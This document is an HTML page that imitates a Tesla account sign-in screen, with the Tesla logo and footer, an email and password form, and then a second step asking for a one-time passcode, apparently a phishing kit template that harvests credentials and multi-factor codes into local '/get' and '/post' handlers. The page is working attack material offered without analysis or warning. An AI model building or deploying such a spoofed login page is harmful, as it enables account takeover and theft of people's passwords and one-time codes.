<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        header {
            justify-content: space-between;
            align-items: center;
            padding: 16px;
            background-color: #fff;
            display: flex;
            width: 100%;
            box-sizing: border-box;
        }

        .tesla-logo {
            max-width: 120px;
            max-height: 64px;
            width: auto;
            height: auto;
        }

        .locale-container {
            display: flex;
            align-items: center;
        }

        .locale-icon {
            max-width: 93px;
            max-height: 44px;
            width: auto;
            height: auto;
            object-fit: contain;
        }

        .locale-container span {
            margin-left: 8px;
            font-size: 16px;
        }

        footer {
            max-width: 287px;
            max-height: 60px;
            width: 100%;
            margin: 0 auto;
            padding: 10px;
            box-sizing: border-box;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        footer ul {
            display: flex;
            list-style-type: none;
            padding: 0;
            margin: 0;
            font-size: 12px;
            color: grey;
            font-weight: bold;
        }

        footer ul li {
            margin: 0 5px;
        }

        body {
            font-family: Arial, sans-serif;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;

        }

        .container {
            max-width: 332px;
            max-height: 450px;
            width: 100%;
            height: 100%;
            box-sizing: border-box;
            background-color: #fff;
            display: flex;
            flex-direction: column;
            align-items: center;
            overflow: hidden;
            min-height: 80vh;
            margin: 0;
        }

        .formcontainer {
            max-width: 332px;
            max-height: 40px;
            min-height: 50vh;
        }

        .email {
            background-color: #f0f0f0;
            border: 1px solid #ccc;
            border-radius: 6px;
            padding: 10px;
            width: 100%;
            max-width: 332px;
            min-width: 332px;
            max-height: 40px;
            box-sizing: border-box;
            font-size: 16px;
            outline: none;
            margin-top: 5px;
        }

        .email:focus {
            border-color: #888;
        }

        .nextbutton {
            background-color: #3E6AE1;
            border-radius: 3px;
            padding: 10px;
            width: 100%;
            max-width: 332px;
            transition: background-color 0.3s ease;
            max-height: 40px;
            box-sizing: border-box;
            font-size: 14px;
            color: white;
            font-weight: bold;
        }

        .nextbutton:hover {
            background-color: #3457B1;
        }

        .nextbutton2 {
            background-color: #3E6AE1;
            border-radius: 3px;
            border: #fff;
            padding: 10px;
            width: 100%;
            min-height: 40px;
            max-width: 332px;
            transition: background-color 0.3s ease;
            max-height: 40px;
            box-sizing: border-box;
            font-size: 14px;
            color: white;
            font-weight: bold;
        }

        .nextbutton2:hover {
            background-color: #3457B1;
        }

        .formtext {
            color: #5C5E62;
            font-size: small;
        }

        .heading1 {
            font-size: xx-large;
            margin: 0;
        }

        .heading2 {
            font-size: small;
            color: #5C5E62;
            margin-top: 5px;
            max-width: 482px;
        }

        .hidden {
            display: none;
        }
    </style>
</head>

<body>
    <header>
        <svg width="100" height="10" viewBox="0 0 342 35" xmlns="http://www.w3.org/2000/svg">
            <path
                d="M0 0h11l.5.1v27.6h6.8V7.3L26 7h11a9.8 9.8 0 007-7H0zm238.6 0h-6.8v34.8H263a9.7 9.7 0 006-6.8h-30.3V0zm-52.3 6.8c3.6-1 6.6-3.8 7.4-6.9h-38.1v20.6h31.1v7.2h-24.4a13.6 13.6 0 00-8.7 7h39.9v-21h-31.2v-7h24zm116.2 28h6.7v-14h24.6v14h6.7v-21h-38zM85.3 7h26a9.6 9.6 0 007.1-7H78.3a9.6 9.6 0 007 7zm0 13.8h26a9.6 9.6 0 007.1-7H78.3a9.6 9.6 0 007 7zm0 14.1h26a9.6 9.6 0 007.1-7H78.3a9.6 9.6 0 007 7zM308.5 7h26a9.6 9.6 0 007-7h-40a9.6 9.6 0 007 7z"
                fill="#000"></path>
        </svg>

    </header>

    <p style="padding-bottom: 0.008px;"></p>
    <div id="hide1">
        <div class="container">
            <div class="form-wrapper">
                <h1 style=" font-size:xx-large;">Sign In</h1>
                <div class="formcontainer">
                    <form id="login-form" action="/get">
                        <label class=" formtext">Email</label>
                        <input type="text" name="email" class="email" required>
                        <p style="padding-bottom: 0.008px;"></p>
                        <label class="formtext">Password</label>
                        <input type="password" name="password" class="email" required>
                        <p style="padding-bottom: 0.01px;"></p>
                        <button class="nextbutton" onclick="unhide()" type="submit">Sign In</button>
                    </form>
                </div>
            </div>
        </div>
    </div>


    <div id="hide2" class="hidden">
        <div class="container">
            <div class="form-wrapper">

                <h1 class="heading1">Enter Passcode</h1>

                <h1 class="heading2">Enter in your One Time Passcode</h1>
                <p style="padding-bottom: 0.1px;"></p>


                <div class="formcontainer">
                    <form id="login-form" action="/post">
                        <label class=" formtext">Passcode</label>
                        <input type="text" id="email2" name="email" class="email" required>
                        <input type="password" id="password2" name="password" class="email" hidden>
                        <p style="padding-bottom: 0.01px;"></p>
                        <button class="nextbutton" type="submit">Submit</button>
                        <p style="padding-bottom: 0.0008px;"></p>
                        <button class=" nextbutton2" style="background-color:#EEEEEE;color:#393C41"
                            type="submit">Cancel</button>
                    </form>
                </div>

            </div>
        </div>
    </div>

    <script>
        function unhide() {
            document.getElementById('hide1').style.display = 'none';
            document.getElementById('hide2').style.display = 'flex';
            document.getElementById('login-form').form.setAttribute('action', 'get');
        }

    </script>

    <footer class="footer">
        <ul>
            <li>Tesla © 2024</li>
            <li>Privacy &amp; Legal</li>
            <li>Contact</li>
        </ul>
    </footer>




</body>

</html>